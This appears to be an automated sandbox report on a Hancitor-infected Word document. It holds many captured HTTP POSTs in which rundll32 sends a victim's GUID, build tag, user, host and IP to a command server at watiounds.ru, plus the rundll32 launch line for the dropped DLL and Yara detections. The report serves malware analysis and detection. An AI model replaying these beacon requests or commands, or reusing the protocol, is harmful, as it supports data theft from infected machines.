                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:01.393727064 CEST | 127 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.522456884 CEST | 127 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGVETARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          83 | 192.168.2.22 | 49248 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:01.833338976 CEST | 128 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.958585024 CEST | 128 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFZAUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          84 | 192.168.2.22 | 49249 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:02.279254913 CEST | 129 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:02.402828932 CEST | 129 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          85 | 192.168.2.22 | 49250 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:02.733459949 CEST | 130 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:02.858032942 CEST | 130 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 51 4a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJQJQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          86 | 192.168.2.22 | 49251 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:03.185461998 CEST | 131 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:03.309042931 CEST | 132 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4e 4d 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGNMTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          87 | 192.168.2.22 | 49252 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:03.642880917 CEST | 132 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:03.772407055 CEST | 133 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCFUXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          88 | 192.168.2.22 | 49253 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:04.091659069 CEST | 134 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:04.220726967 CEST | 134 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          89 | 192.168.2.22 | 49254 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:04.551783085 CEST | 135 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:04.679984093 CEST | 135 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNJQMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          9 | 192.168.2.22 | 49174 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:18:33.090591908 CEST | 26 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:33.215881109 CEST | 26 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQCXJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          90 | 192.168.2.22 | 49255 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:05.013000011 CEST | 136 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:05.146625042 CEST | 136 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTYBGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          91 | 192.168.2.22 | 49256 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:05.461169958 CEST | 137 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:05.587460041 CEST | 137 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVAZEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          92 | 192.168.2.22 | 49257 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:05.919809103 CEST | 138 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.051492929 CEST | 138 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCMNXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          93 | 192.168.2.22 | 49258 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:06.354187965 CEST | 139 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.475883007 CEST | 139 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          94 | 192.168.2.22 | 49259 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:06.828737974 CEST | 140 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.957900047 CEST | 141 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBBYYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          95 | 192.168.2.22 | 49260 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:07.290916920 CEST | 141 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:07.423192978 CEST | 142 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCKPXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          96 | 192.168.2.22 | 49261 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:07.738307953 CEST | 142 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:07.863718987 CEST | 143 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCKPXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          97 | 192.168.2.22 | 49262 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:08.195903063 CEST | 144 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:08.325272083 CEST | 144 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJGTQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          98 | 192.168.2.22 | 49263 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:08.634500980 CEST | 145 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:08.760154963 CEST | 145 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          99 | 192.168.2.22 | 49264 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:09.081423044 CEST | 146 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:09.212142944 CEST | 146 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVBYEARRABw==0


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Memory Usage

                                          High Level Behavior Distribution

                                          Behavior

                                          System Behavior

                                          General

                                          Start time:08:15:30
                                          Start date:29/04/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f590000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:08:15:34
                                          Start date:29/04/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
                                          Imagebase:0xff890000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:08:15:34
                                          Start date:29/04/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
                                          Imagebase:0x7e0000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Hancitor, Description: Hancitor Payload, Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Hancitor, Description: Hancitor Payload, Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, Author: kevoreilly
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Call Graph

                                          Graph

                                          Legend: Entrypoint, Decryption Function, Executed, Not Executed

                                          Call graph nodes (function, with API call counts where listed):
                                          • Getme (Run:2, CreateObject:1, Dir:4, Name:1)
